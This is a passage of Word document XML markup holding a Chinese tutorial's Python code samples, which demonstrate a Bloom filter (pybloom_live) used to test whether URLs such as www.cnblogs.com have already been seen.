        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>"www.cnblogs.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC27B92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B4EC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>url2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>"www.liuqingzheng.top"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D91D39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61430F1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>bloom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>add(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A7AB97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6EBAD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>(url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>bloom)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26019A2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2684774E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>(url2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>bloom)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="768"/>
    <w:p w14:paraId="42E1C5B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6A401D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092A7B72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DCE6EE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>#BloomFilter 是定长的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33814705" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="646464"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>pybloom_live</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>BloomFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018E6004" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="F1403C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E061AB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="default"/>
          <w:color w:val="121212"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6F6F6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
